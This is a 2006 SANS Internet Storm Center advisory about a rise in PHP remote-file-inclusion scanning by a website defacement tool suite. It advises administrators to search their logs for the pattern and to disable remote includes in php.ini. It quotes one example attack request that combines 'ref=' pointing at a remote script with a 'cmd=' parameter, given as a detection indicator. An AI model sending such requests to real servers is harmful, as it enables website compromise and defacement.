Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Probable php shell/web defacement tool usage on the rise SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Probable php shell/web defacement tool usage on the rise
The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion.  Multiple reports in a short period of time seem to indicate aggressive scanning activity leveraging this tool suite.  This particular attacker/tool combination has search engine hits going back to early December 2005, so the tool has been around for at the very least a short period of time.  The initally reported site hosting the se php scripts has already removed the offending tools, but script hosting will always remain a moving target.

If you are running PHP enabled web servers, take a peek at your recent http logs for any hits similar to the following.  Clearly the common thread will be 'ref=' and 'cmd=' on the same http log entry.  Looks fairly trivial to create a snort signature to identify this scanning/abuse considering that this is an edge case that bleedingsnort rules does not yet alert on.  We'll probably post a usable snort signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.

If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable.

allow_url_fopen = Off


39 Posts
Jan 9th 2006

Sign Up for Free or Log In to start participating in the conversation!